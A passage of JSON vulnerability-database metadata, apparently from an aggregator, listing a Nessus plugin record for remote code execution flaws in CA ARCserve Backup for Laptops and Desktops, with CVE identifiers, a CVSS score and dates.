"CVE-2007-5006"], "lastseen": "2017-11-19T21:57:48"}], "nessus": [{"id": "CA_BABLD_LGSERVER_RCE1.NASL", "type": "nessus", "title": "CA ARCserve Backup for Laptops and Desktops Server and CA Desktop Management Suite Multiple Remote Vulnerabilities", "description": "According to the version of rxRPC.dll installed on the remote host, the Computer Associates product is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the host.", "published": "2013-08-13T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=69317", "cvelist": ["CVE-2007-5006", "CVE-2007-5005", "CVE-2008-1329", "CVE-2007-5003", "CVE-2008-1328", "CVE-2007-3216", "CVE-2007-5004"], "lastseen": "2017-10-29T13:46:13"}]}}